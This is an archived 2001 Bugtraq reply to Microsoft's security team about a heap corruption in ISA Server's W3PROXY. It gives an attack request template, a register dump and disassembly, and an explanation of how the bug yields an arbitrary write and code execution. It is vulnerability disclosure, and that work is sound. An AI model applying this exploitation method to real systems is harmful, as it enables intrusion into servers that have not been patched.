Re: Microsoft ISA Server Vulnerability

From: dark spyrit (dspyritat_private)
Date: Fri Apr 27 2001 - 17:48:10 PDT


This was tested with the standard edition available on the Microsoft site.

Details -

04/27/2001  01:56a             369,936 W3PROXY.EXE

Request - GET http://host/<2338 x nop><offset to user buffer><stored ret address>

We found we needed to send this request twice to reach the code location
where we are able to execute our buffer. The heap corruption can lead to
random crash locations, but we hit this point more often than not. The
fact is, it is possible.

EAX=41414141 EBX=02492394 ECX=78787878 EDX=0105B9F8 ESI=0105B9F8
EDI=024A25F0 EBP=0621FE1C ESP=0621FDF8 EIP=0101D72F o d I s z A p c
CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000 ds:41414141=FFFFFFFF

001b:0101d72f   mov     [eax], ecx
001b:0101d731   mov     [ecx+04], eax
001b:0101d734   call    [ntdll!RtlLeaveCriticalSection]
001b:0101d73a   mov     eax, edi
001b:0101d73c   pop     edi
001b:0101d73d   pop     esi
001b:0101d73e   ret

(PASSIVE)-KTEB(854083E0)-TID(05C4)--W3PROXY!.text+0001C741----------

As you can see we are able to define the values of ecx and eax; we can
write whatever data we want to a location of our choosing.
By overwriting eax with a saved return address and ecx with the address of
our buffer we can execute our code.

We had a couple of inventive ways of getting the needed stack values;
overwriting string locations with the data and having the product output the
values was one. A few possibilities.

Am I done?

dark spyrit.
    
    
----- Original Message -----
From: "Microsoft Security Response Center" <secureat_private>
To: <BUGTRAQat_private>
Sent: Saturday, April 28, 2001 2:54 AM
Subject: Re: Microsoft ISA Server Vulnerability


Hi -

You're right that the root problem here is a heap corruption.  The
Knowledge Base article we published on the subject
(http://support.microsoft.com/support/kb/articles/q295/2/79.asp,
"Cause") notes that this is the case.  As part of our investigation, we
examined whether the heap corruption could, in this case, be exploited
to run code, but we were unable to find any way to do so.  If you can
demonstrate an ability to run code via the exploit, please contact us
immediately as we'd be most interested in investigating the issue
further.

Regards,

Scott Culp
Security Program Manager
Microsoft Corporation



    This archive was generated by hypermail 2b30 : Sat Apr 28 2001 - 10:13:15 PDT